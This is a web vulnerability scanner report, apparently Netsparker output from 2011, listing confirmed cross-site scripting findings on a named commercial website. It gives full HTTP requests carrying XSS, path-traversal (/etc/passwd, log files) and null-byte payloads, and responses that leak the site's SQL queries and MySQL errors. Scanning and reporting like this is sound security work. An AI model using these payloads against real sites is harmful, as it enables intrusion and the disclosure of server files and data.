/ppc/leadflow/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013ED)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013ED..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0013ED)</script>

Request

GET /ppc/leadflow/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0013ED)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/js/jquery.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=98saapfvnjvbuimvufvtisrpo5; path=/
Content-Length: 2913
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>' OR prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>' OR prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>' OR prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>' OR prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>' OR prj.project_page_url = 'leadflow/js/'"--></style></script><script>netsparker(0x0013ED)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0013ED)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001474)%3C/script%3E

/ppc/leadflow/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001474)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x001474)</script>

Request

GET /ppc/leadflow/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001474)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/images/Employ_girl.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:43 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=koe091mbq7jnsei3833l2nntq5; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>' OR prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>' OR prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>' OR prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>' OR prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>' OR prj.project_page_url = 'leadflow/images/'"--></style></script><script>netsparker(0x001474)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x001474)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/project_dynamic_page_updated.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001435)%3C/script%3E

/ppc/leadflow/project_dynamic_page_updated.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001435)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/project_dynamic_page_updated.php'%22--%3E%3C/style%3E%3C/script..

Parameters

Parameter Type Value
catId GET 20001
group GET wede00
template GET 3
URI-BASED Raw URI '"--></style></script><script>alert(0x001435)</script>

Request

GET /ppc/leadflow/project_dynamic_page_updated.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x001435)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ujmaj23j0448b33o50orvg40n0; path=/
Content-Length: 3203
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>' OR prj.project_page_url = 'leadflow/project_dynamic_page_updated.php'"--></style></script><script>netsparker(0x001435)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on 